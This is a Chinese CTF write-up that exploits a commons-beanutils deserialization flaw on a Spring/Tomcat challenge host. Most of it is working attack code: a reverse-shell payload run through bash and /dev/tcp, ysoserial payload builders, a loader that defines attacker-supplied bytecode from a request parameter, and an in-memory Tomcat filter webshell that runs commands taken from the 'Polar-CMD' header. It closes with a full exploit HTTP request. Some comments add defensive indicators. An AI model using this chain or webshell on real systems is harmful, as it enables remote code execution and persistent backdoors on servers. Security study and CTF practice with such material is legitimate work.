polar CTF CB链

一、题目
在这里插入图片描述

二、解答
(以下是常规思路,但这道题用它解不出来,可以直接跳到后面“真正的解题步骤”部分)
1、通过jar包,可以看到/user路由下有反序列化操作
在这里插入图片描述
看到存在commons-beanutils依赖且版本为1.9.2,可利用CB链Getshell。

使用ysoserial项目中的CommonsBeanutils1链写一个POC,注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致;

ysoserial项目地址:https://github.com/frohoff/ysoserial

编辑恶意类(下面代码中的 MyExec)内容如下:

package ysoserial.poc;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;
​
/**
 * Translet whose whole effect is its static initializer; both {@code transform} overrides are
 * empty and only make the class concrete.
 *
 * <p>The payload builder on this page copies this class's bytecode into the {@code _bytecodes}
 * field of a {@code TemplatesImpl}, so the static block runs in whichever JVM later initializes
 * the class, not only in the JVM that compiled it.
 *
 * <p>Defender notes: the command line below (bash -c with the echo / base64 -d / bash -i brace
 * groups) is a recognizable process-creation signature, and a servlet container spawning bash
 * with it is worth alerting on. The write-up describes the encoded command as a reverse shell,
 * which depends on outbound connectivity from the server, and reports that this variant does
 * not work against the challenge host.
 */
public class MyExec extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
    // Executed once, at class initialization, before any instance method can be called.
    static {
        try {
            // Hands a single bash command line to Runtime.exec; the Base64 text inside it is
            // decoded and run by bash on the host where this class is initialized.
            // NOTE(review): the Base64 literal does not look like a well-formed encoding (possibly
            // truncated or redacted on the page); it is kept exactly as published.
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4x5MDAxIDA+JjE=}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {
            // A failed process start is only printed; class initialization still completes.
            e.printStackTrace();
        }
    }
}

自定义命令如下:

// Template of the call used in MyExec's static initializer; the Chinese placeholder stands for a
// Base64-encoded command. Detection: a Java process whose child command line contains the
// "{echo," ... "{base64,-d}" ... "{bash,-i}" brace groups is a high-signal indicator.
Runtime.getRuntime().exec("bash -c {echo,反弹shell的payload Base64编码}|{base64,-d}|{bash,-i}");

Payload生成类如下:

package ysoserial.poc;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;import ysoserial.payloads.util.Reflections;
​
/**
 * Builds a serialized {@code PriorityQueue} whose comparator is a commons-beanutils
 * {@code BeanComparator} and whose elements are a {@code TemplatesImpl}, then prints the stream
 * Base64-encoded.
 *
 * <p>Why this object graph is dangerous to deserialize: when {@code readObject} restores the
 * queue it re-orders the elements through the comparator; the comparator reads the bean property
 * {@code outputProperties} from each element, which on {@code TemplatesImpl} leads to the class
 * stored in {@code _bytecodes} being defined and instantiated.
 *
 * <p>Defender notes: the printed value is a Java serialization stream, so its Base64 form starts
 * with {@code rO0AB} (visible in the {@code user} parameter of the request shown on this page).
 * The root cause on the server is {@code readObject} on request data; the robust fix is not to
 * deserialize untrusted input, or to apply an allow-list {@code ObjectInputFilter} /
 * {@code jdk.serialFilter} so that classes such as {@code BeanComparator} and
 * {@code TemplatesImpl} are rejected.
 */
public class PoC {
​
    /**
     * Assembles the queue, serializes it in memory and writes the Base64 text to stdout.
     *
     * @param args unused
     * @throws Exception propagated from reflection, javassist or serialization
     */
    public static void main(String[] args) throws Exception {
​
        TemplatesImpl templates = getTemplate();
​
        // mock method name until armed
        // (property is null here, so the add() calls below compare plain strings only)
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
​
        // create queue with numbers and basic comparator
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");
​
        // switch method called by comparator
        // (done only after the queue is populated, so nothing is triggered while building it)
        Reflections.setFieldValue(comparator, "property", "outputProperties");
​
        // switch contents of queue
        // (writes straight into the backing array, bypassing add() and therefore the comparator)
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = templates;
​
        // Serialize to memory and print as Base64; nothing is sent anywhere by this program.
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
        byte[] bytes = byteArrayOutputStream.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(bytes));
        // Disabled local round-trip: reading the bytes back would run the chain in this JVM.
//        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
//        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
//        objectInputStream.readObject();
    }
    /**
     * Creates a {@code TemplatesImpl} carrying the bytecode of {@code MyExec}.
     *
     * <p>The class file is obtained through javassist and stored via the ysoserial
     * {@code Reflections} helper (presumably plain reflective field writes; the helper is not
     * shown on this page) into {@code _bytecodes}, together with {@code _name} and
     * {@code _tfactory}.
     *
     * @return the populated template object
     * @throws Exception propagated from javassist or reflection
     */
    public static TemplatesImpl getTemplate() throws Exception {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clz = classPool.get(MyExec.class.getName());
        TemplatesImpl obj = new TemplatesImpl();
        Reflections.setFieldValue(obj, "_bytecodes", new byte[][]{clz.toBytecode()});
        Reflections.setFieldValue(obj, "_name", "HelloTemplatesImpl");
        Reflections.setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        return obj;
    }
}

3、漏洞利用
攻击机监听端口:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这种传统方法(反弹shell)在这道题上不好用(靶机不出网,无法回连攻击机)。
下面才是真正的解题步骤(从这里开始):
1、不出网利用(动态类加载):首先需要简单改造一下ysoserial,定义一个类加载器:

package ysoserial;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.util.Base64;
​
/**
 * Translet whose static initializer defines a second class from bytes supplied in the current
 * HTTP request and hands that class the request, response and session.
 *
 * <p>Everything happens in the static block; the two {@code transform} methods are empty.
 *
 * <p>Defender notes, all taken from what this code does:
 * <ul>
 *   <li>it reads a request parameter named {@code classData} and Base64-decodes it into a class
 *       file, so the parameter value starts with {@code yv66vg} (Base64 of the class-file magic),
 *       as in the request shown on this page;</li>
 *   <li>it prints a line beginning {@code classData:} to standard output, which lands in the
 *       container's stdout log;</li>
 *   <li>it calls {@code ClassLoader.defineClass} reflectively from application code, which
 *       instrumentation or RASP tooling can flag.</li>
 * </ul>
 */
public class MyClassLoader extends AbstractTranslet {
    static{
        try{
            // Current request as tracked by Spring for the handling thread.
            javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();
            // Reads the private "request" field of the request object's class to reach the
            // Catalina Request behind it, and from there the Catalina Response.
            java.lang.reflect.Field r=request.getClass().getDeclaredField("request");
            r.setAccessible(true);
            org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();
            javax.servlet.http.HttpSession session = request.getSession();
​
            // Second-stage class arrives as a Base64 request parameter and is echoed to stdout.
            String classData=request.getParameter("classData");
            System.out.println("classData:"+classData);
​
            // Decoded bytes are defined as a class in the loader that loaded MyClassLoader,
            // using the non-public defineClass(byte[], int, int) via reflection.
            byte[] classBytes = Base64.getDecoder().decode(classData);
            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass",new Class[]{byte[].class, int.class, int.class});
            defineClassMethod.setAccessible(true);
            Class cc = (Class) defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);
            // equals(Object) is used as the entry point of the defined class; the argument is
            // an Object[] of {request, response, session} rather than something to compare.
            cc.newInstance().equals(new Object[]{request,response,session});
        }catch(Exception e){
            // Any failure (missing parameter, bad Base64, reflection error) is only printed.
            e.printStackTrace();
        }
    }
    public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {
    }
    public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {
    }
}

然后在ysoserial.payloads.util包的Gadgets类中照着原有的createTemplatesImpl方法添加一个createTemplatesImpl(Class c),参数即为我们要让服务端加载的类,如下直接将传入的c转换为字节码赋值给了_bytecodes

/**
 * Creates a templates object whose {@code _bytecodes} field holds the class file of {@code c}.
 *
 * <p>The implementation class is {@code org.apache.xalan.xsltc.trax.TemplatesImpl} when the
 * system property {@code properXalan} is {@code true}, otherwise the {@code TemplatesImpl}
 * already imported by the enclosing file. Fields are written through the ysoserial
 * {@code Reflections} helper and the bytes come from {@code ClassFiles.classAsBytes}; neither
 * helper is shown on this page.
 *
 * @param c class whose bytecode is embedded
 * @param <T> type the caller assigns the result to; the casts below are unchecked
 * @return the populated templates object, with {@code _name} set to {@code "Pwnr"}
 * @throws Exception propagated from class lookup, instantiation or reflection
 */
public static <T> T createTemplatesImpl(Class c) throws Exception {
    Class<T> tplClass = null;if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
        tplClass = (Class<T>) Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl");
    }else{
        tplClass = (Class<T>) TemplatesImpl.class;
    }
​
    final T templates = tplClass.newInstance();
    // Raw class-file bytes of c, as returned by the helper.
    final byte[] classBytes = ClassFiles.classAsBytes(c);
​
    // Single-element array: only the one supplied class is embedded.
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
        classBytes
    });
​
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    return templates;
}

以CB链为例写一个POC

package ysoserial.poc;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.Reflections;
​
/**
 * Variant of the payload builder that embeds {@code ysoserial.MyClassLoader} instead of a
 * command-running class, prints the serialized queue as Base64 and then deserializes it again
 * in the same JVM.
 *
 * <p>The object graph is the same as in the earlier builder on this page: a
 * {@code PriorityQueue} ordered by a {@code BeanComparator} on property
 * {@code outputProperties}, holding a {@code TemplatesImpl}.
 *
 * <p>Defender notes: the output is a Java serialization stream (Base64 prefix {@code rO0AB}).
 * Server-side, an allow-list {@code ObjectInputFilter} / {@code jdk.serialFilter}, or removing
 * native deserialization of request data altogether, stops this graph before any of its classes
 * are instantiated.
 */
public class PoC {
​
    /**
     * Assembles, serializes, prints and locally re-reads the queue.
     *
     * @param args unused
     * @throws Exception propagated from reflection or (de)serialization
     */
    public static void main(String[] args) throws Exception {
​
        final TemplatesImpl templates = Gadgets.createTemplatesImpl(ysoserial.MyClassLoader.class);
        //final TemplatesImpl templates = Gadgets.createTemplatesImpl(ysoserial.poc.Exp.class);
        //final TemplatesImpl templates = getTemplate();
​
        // mock method name until armed
        // (property is null here, so the add() calls below compare plain strings only)
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
​
        // create queue with numbers and basic comparator
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");
​
        // switch method called by comparator
        // (done only after the queue is populated, so nothing is triggered while building it)
        Reflections.setFieldValue(comparator, "property", "outputProperties");
​
        // switch contents of queue
        // (writes straight into the backing array, bypassing add() and therefore the comparator)
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = templates;
​
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
​
        byte[] bytes = byteArrayOutputStream.toByteArray();
​
        System.out.println(Base64.getEncoder().encodeToString(bytes));
​
        // Local round-trip: readObject() on these bytes runs the chain inside this JVM as well,
        // so this program should only be run in a disposable environment.
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();
    }
    // Disabled alternative kept by the author: builds the template from a class named
    // Tomcat_Echo_inject_Filter, which is not shown on this page.
//  public static TemplatesImpl getTemplate() throws Exception {
//
//        ClassPool classPool = ClassPool.getDefault();
//        CtClass clz = classPool.get(Tomcat_Echo_inject_Filter.class.getName());
//
//        TemplatesImpl obj = new TemplatesImpl();
//        Reflections.setFieldValue(obj, "_bytecodes", new byte[][]{clz.toBytecode()});
//        Reflections.setFieldValue(obj, "_name", "HelloTemplatesImpl");
//        Reflections.setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
//
//        return obj;
//    }
}

接下来即可写一个恶意类,该类可应用于不出网情景,可将简单的命令执行回显在response的Header中,

为了方便注册filter,我直接让该类实现了Filter接口,在doFilter方法中完成Exp的主要逻辑,在equals方法中进行filter的动态注册

package ysoserial.poc;import javax.servlet.*;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.stream.Collectors;
​
/**
 * Servlet filter that registers itself at runtime and, for requests carrying a
 * {@code Polar-CMD} header, runs the header value as a process and returns the output in
 * response headers.
 *
 * <p>The class is not deployed with the application: per this page it is delivered as bytes,
 * defined in memory by the loader class, and entered through {@link #equals(Object)}, which
 * receives {@code Object[]{request, response, session}}.
 *
 * <p>Defender notes, taken from the code below:
 * <ul>
 *   <li>network indicators: request header {@code Polar-CMD}; response headers
 *       {@code Polar-START: OK} and {@code Polar-RESULT};</li>
 *   <li>host indicators: the servlet container spawning child processes; each header value and
 *       the literal {@code 3} printed to stdout;</li>
 *   <li>container state: a filter named {@code Shell} mapped to {@code /*} for the REQUEST
 *       dispatcher that has no entry in the deployment descriptor and no class file in the
 *       web application, which an inventory of registered filters compared against the
 *       deployed artifacts will surface. It lives only in memory, so a restart removes it,
 *       but the deserialization entry point must still be fixed.</li>
 * </ul>
 */
public class Exp implements javax.servlet.Filter{
    // Set in equals(); only `request` is read afterwards (passed to dynamicAddFilter).
    private javax.servlet.http.HttpServletRequest request = null;
    private org.apache.catalina.connector.Response response = null;
    private javax.servlet.http.HttpSession session =null;
​
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
    }
    public void destroy() {}
    /**
     * Runs the {@code Polar-CMD} header value as a process when the header is present;
     * otherwise passes the request down the chain unchanged.
     *
     * <p>When the header is present the chain is not invoked, so the application never sees
     * that request. The locals {@code request}, {@code response} and {@code session} shadow the
     * fields of the same names.
     */
    @Override
    public void doFilter(ServletRequest request1, ServletResponse response1, FilterChain filterChain) throws IOException, ServletException {
        javax.servlet.http.HttpServletRequest request = (javax.servlet.http.HttpServletRequest)request1;
        javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse)response1;
        javax.servlet.http.HttpSession session = request.getSession();
        String cmd = request.getHeader("Polar-CMD");
        // Every request's header value (including null) is written to stdout.
        System.out.println(cmd);
        if (cmd != null) {
            //System.out.println("1");
            response.setHeader("Polar-START", "OK");
            // Run the command with ProcessBuilder; the header is split on whitespace into argv
            // and stderr is merged into stdout.
            Process process = new ProcessBuilder(cmd.split("\\s+"))
                .redirectErrorStream(true)
                .start();
            //System.out.println("2");
            // Stream carrying the command's output
            InputStream inputStream = process.getInputStream();
​
            // Collect the stream into one string with Java 8 streams (platform default charset,
            // lines re-joined with the platform line separator).
            String result = new BufferedReader(new InputStreamReader(inputStream))
                .lines()
                .collect(Collectors.joining(System.lineSeparator()));
            System.out.println("3");
            response.setHeader("Polar-RESULT",result);} else {
            filterChain.doFilter(request, response);
        }
    }
​
    /**
     * Entry point invoked by the loader class; not an equality check.
     *
     * @param obj expected to be an {@code Object[]} of request, response and session, in that
     *     order; any other argument fails the casts below
     * @return always {@code true}
     */
    public boolean equals(Object obj) {
        Object[] context=(Object[]) obj;
        this.session = (javax.servlet.http.HttpSession ) context[2];
        this.response = (org.apache.catalina.connector.Response) context[1];
        this.request = (javax.servlet.http.HttpServletRequest) context[0];
​
        try {
            // Registers a fresh Exp instance under the name "Shell" for every URL.
            dynamicAddFilter(new Exp(),"Shell","/*",request);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }return true;
    }
​
    /**
     * Registers {@code filter} on the running Tomcat context if no filter of that name exists.
     *
     * <p>Reaches Tomcat's {@code StandardContext} by reading the private {@code context} field
     * twice (servlet context, then {@code ApplicationContext}), sets the lifecycle {@code state}
     * field to {@code STARTING_PREP} around the {@code addFilter} call, maps the filter, invokes
     * {@code filterStart}, and sets the state back to {@code STARTED}.
     * NOTE(review): the state change is presumably there because the container refuses
     * programmatic filter registration once the context has started; confirm against the
     * Tomcat version in use.
     *
     * @param filter filter instance to register
     * @param name registration name, also used for the existence check
     * @param url URL pattern the filter is mapped to
     * @param request request used only to obtain the servlet context
     * @throws IllegalAccessException from the reflective write in the {@code finally} block
     */
    public static void dynamicAddFilter(javax.servlet.Filter filter,String name,String url,javax.servlet.http.HttpServletRequest request) throws IllegalAccessException {
        javax.servlet.ServletContext servletContext=request.getServletContext();
        // Idempotence guard: nothing happens when a filter with this name is already present.
        if (servletContext.getFilterRegistration(name) == null) {
            java.lang.reflect.Field contextField = null;
            org.apache.catalina.core.ApplicationContext applicationContext =null;
            org.apache.catalina.core.StandardContext standardContext=null;
            java.lang.reflect.Field stateField=null;
            javax.servlet.FilterRegistration.Dynamic filterRegistration =null;
​
            try {
                contextField=servletContext.getClass().getDeclaredField("context");
                contextField.setAccessible(true);
                applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(servletContext);
                contextField=applicationContext.getClass().getDeclaredField("context");
                contextField.setAccessible(true);
                standardContext= (org.apache.catalina.core.StandardContext) contextField.get(applicationContext);
                stateField=org.apache.catalina.util.LifecycleBase.class.getDeclaredField("state");
                stateField.setAccessible(true);
                stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);
                filterRegistration = servletContext.addFilter(name, filter);
                filterRegistration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{url});
                java.lang.reflect.Method filterStartMethod = org.apache.catalina.core.StandardContext.class.getMethod("filterStart");
                filterStartMethod.setAccessible(true);
                filterStartMethod.invoke(standardContext, null);
                stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED);
            }catch (Exception e){
                // Failures are discarded without logging.
            }finally {
                // State is written back to STARTED on every path.
                stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED);
            }
        }
    }
}

构造完的请求包如下,其中user后面的参数为PoC运行输出的payload,
classData为Exp.class文件内容的Base64编码,用如下命令得到:

# Print Exp.class as Base64 on a single line: base64 wraps its output, and the sed loop
# (label, N, s/\n//, branch back) joins the wrapped lines by deleting the newlines between them.
cat Exp.class|base64|sed ':label;N;s/\n//;b label'

可直接将该class文件复制到linux虚拟机中查询

POST /user?user=rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB%2bAARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2bAYIVOACAAB4cAAADvbK/rq%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%2bAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAAXIBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIcmVzcG9uc2UBAChMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2U7AQAHc2Vzc2lvbgEAIExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAJY2xhc3NEYXRhAQASTGphdmEvbGFuZy9TdHJpbmc7AQAKY2xhc3NCeXRlcwEAAltCAQARZGVmaW5lQ2xhc3NNZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAAmNjAQARTGphdmEvbGFuZy9DbGFzczsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAfAEAClNvdXJjZUZpbGUBABJNeUNsYXNzTG9hZGVyLmphdmEMACkAKgcAgAwAgQCCAQBAb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwwAgwCEDACFAIYMAIcAiAcAiQwAigCLDACMAI0BACVvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXF1ZXN0DACOAI8HAJAMAJEAkgwAkwCUBwCVDACWAJcBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACmNsYXNzRGF0YToMAJgAmQwAmgCbBwCcDACdAJ4HAJ8MAKAAowcApAwApQCmAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MHAKcMAKgATAwAqQCqBwCrAQAXeXNvc2VyaWFsL015Q2xhc3NMb2FkZXIMAKwArQEAEGphdmEvbGFuZy9PYmplY3QMAK4ArwwAsACxDACyALMMALQAtQEAE2phdmEvbGFuZy9FeGNlcHRpb24MALYAKgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29y
Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENvbnRleHRIb2xkZXIBABRnZXRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBAApnZXRSZXF1ZXN0AQApKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0UmVzcG9uc2UBACooKUxvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZTsBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABBqYXZhL3V0aWwvQmFzZTY0AQAKZ2V0RGVjb2RlcgEAB0RlY29kZXIBAAxJbm5lckNsYXNzZXMBABwoKUxqYXZhL3V0aWwvQmFzZTY0JERlY29kZXI7AQAYamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyAQAGZGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEAD3ByaW50U3RhY2tUcmFjZQAhAB8AKAAAAAAABAABACkAKgABACsAAAAvAAEAAQAAAAUqtwABsQAAAAIALAAAAAYAAQAAAAoALQAAAAwAAQAAAAUALgAvAAAAAQAwADEAAgArAAAAPwAAAAMAAAABsQAAAAIALAAAAAYAAQAAACAALQAAACAAAwAA
AAEALgAvAAAAAAABADIAMwABAAAAAQA0ADUAAgA2AAAABAABADcAAQAwADgAAgArAAAASQAAAAQAAAABsQAAAAIALAAAAAYAAQAAACIALQAAACoABAAAAAEALgAvAAAAAAABADIAMwABAAAAAQA0ADkAAgAAAAEAOgA7AAMANgAAAAQAAQA3AAgAPAAqAAEAKwAAAZUABgAIAAAAyLgAAsAAA7YABEsqtgAFEga2AAdMKwS2AAgrKrYACcAACrYAC00quQAMAQBOKhINuQAOAgA6BLIAD7sAEFm3ABESErYAExkEtgATtgAUtgAVuAAWGQS2ABc6BRIYEhkGvQAaWQMSG1NZBLIAHFNZBbIAHFO2AB06BhkGBLYAHhkGEh%2b2ACAGvQAhWQMZBVNZBAO4ACJTWQUZBb64ACJTtgAjwAAaOgcZB7YAJAa9ACFZAypTWQQsU1kFLVO2ACVXpwAISyq2ACexAAEAAAC/AMIAJgADACwAAABCABAAAAANAAoADgAUAA8AGQAQACUAEQAsABMANgAUAFAAFgBaABcAeAAYAH4AGQCmABoAvwAdAMIAGwDDABwAxwAeAC0AAABcAAkACgC1AD0APgAAABQAqwA/AEAAAQAlAJoAQQBCAAIALACTAEMARAADADYAiQBFAEYABABaAGUARwBIAAUAeABHAEkASgAGAKYAGQBLAEwABwDDAAQATQBOAAAATwAAAAkAAvcAwgcAUAQAAgBRAAAAAgBSAKIAAAAKAAEAbABqAKEACXB0AARQd25ycHcBAHhxAH4ADXg%3d HTTP/1.1
Host: 1ff2e0a3-f2f2-4526-a7d6-58bb50e63c95.www.polarctf.com:8090
Cache-Control: max-age=0
DNT: 1
Polar-CMD:ls
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 8494

